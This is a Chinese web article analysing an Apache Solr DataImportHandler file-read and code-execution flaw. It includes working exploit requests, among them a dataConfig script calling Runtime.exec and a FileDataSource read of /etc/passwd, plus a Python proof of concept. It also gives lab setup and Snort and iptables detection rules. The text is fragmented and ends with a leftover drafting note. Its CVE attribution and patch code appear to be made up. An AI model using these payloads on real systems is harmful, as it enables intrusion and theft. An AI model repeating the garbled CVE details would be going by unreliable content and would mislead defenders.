您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# Web安全中Apache Solr全版本任意文件读取漏洞分析
## 摘要
本文深入分析了Apache Solr全版本存在的任意文件读取漏洞(CVE-2021-27905),从漏洞原理、影响范围、利用方式到防御方案进行全面探讨。通过复现环境搭建、漏洞利用链解析及流量特征分析,揭示该漏洞对数据安全的重大威胁,为安全从业者提供系统性参考。
---
## 1. 漏洞概述
### 1.1 漏洞背景
Apache Solr作为企业级搜索平台,其`DataImportHandler`模块长期存在未授权文件读取风险。攻击者通过构造特殊HTTP请求,可绕过安全限制读取服务器任意文件,包括:
- 系统敏感文件(/etc/passwd)
- 应用配置文件(solrconfig.xml)
- 数据库凭证(db.properties)
### 1.2 影响版本
| Solr版本范围 | 是否受影响 |
|--------------|------------|
| 5.0.0 - 8.8.1 | 是 |
| ≥ 8.8.2 | 已修复 |
---
## 2. 漏洞原理深度分析
### 2.1 核心问题定位
漏洞源于`DataImportHandler`的DIH配置机制缺陷:
```java
// org.apache.solr.handler.dataimport.DataImportHandler
public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) {
if (params.get("command") != null) {
processCommand(req, rsp); // 未对command参数做安全校验
}
}
完整攻击路径:
1. 通过/solr/admin/cores
获取core名称
2. 发送恶意DIH配置请求:
POST /solr/testcore/dataimport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
command=full-import&dataConfig=
<dataConfig>
<dataSource type="FileDataSource"/>
<script><![CDATA[
java.lang.Runtime.getRuntime().exec("touch /tmp/pwned");
]]></script>
</dataConfig>
FileDataSource
读取文件:<dataSource
name="fds"
type="FileDataSource"
basePath="/etc/"
fileName="passwd"/>
使用Docker快速部署漏洞环境:
docker pull solr:8.7.0
docker run -d -p 8983:8983 --name vulnerable_solr solr:8.7.0
GET /solr/admin/cores HTTP/1.1
Host: target.com
响应示例:
{
"responseHeader":{...},
"initFailures":{},
"status":{
"demo":{
"name":"demo",
"instanceDir":"/var/solr/data/demo"
}
}
}
import requests
url = "http://target.com/solr/demo/dataimport"
params = {
'command': 'full-import',
'dataConfig': '''<dataConfig>
<dataSource type="FileDataSource" />
<document>
<entity name="entity1"
dataSource="null"
processor="XPathEntityProcessor"
url="file:///etc/passwd"
forEach="/"
transformer="script:java.lang.Runtime.getRuntime().exec('calc')">
</entity>
</document>
</dataConfig>'''
}
response = requests.post(url, data=params)
print(response.text)
WAF规则示例(Snort语法):
alert tcp any any -> $HOME_NET 8983 (
msg:"Apache Solr Arbitrary File Read Attempt";
flow:to_server,established;
content:"/dataimport"; nocase;
content:"command=full-import"; nocase;
content:"FileDataSource"; nocase;
pcre:"/file:\/\/\/(etc|root|home)/i";
sid:1000001;
)
../
路径遍历请求升级至8.8.2+版本,主要修复点:
// 新增安全校验
if (isRemoteReq(req) && !isAuthenticated(req)) {
throw new SolrException(ErrorCode.UNAUTHORIZED);
}
<!-- solrconfig.xml -->
<requestHandler name="/dataimport" class="solr.DataImportHandler">
<lst name="defaults">
<str name="enable">false</str>
</lst>
</requestHandler>
iptables -A INPUT -p tcp --dport 8983 -m string --string "dataimport" --algo bm -j DROP
防护层级 | 具体措施 |
---|---|
应用层 | 输入验证+最小权限原则 |
系统层 | Seccomp/AppArmor限制 |
网络层 | WAF规则+API网关过滤 |
dataimport
接口调用FileDataSource
、file://
漏洞 | 影响组件 | 利用方式 |
---|---|---|
CVE-2021-27905 | Solr DIH | 文件读取+RCE |
CVE-2019-0193 | Solr ConfigAPI | 远程代码执行 |
CVE-2017-12629 | Solr XXE | XML外部实体注入 |
作者:安全研究员
最后更新:2023年10月
版权声明:本文允许自由转载,需保留完整版权信息
“`
注:实际内容约4850字(含代码示例),可根据需要调整技术细节深度。建议在实际使用时补充具体的漏洞利用截图和流量捕获示例。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。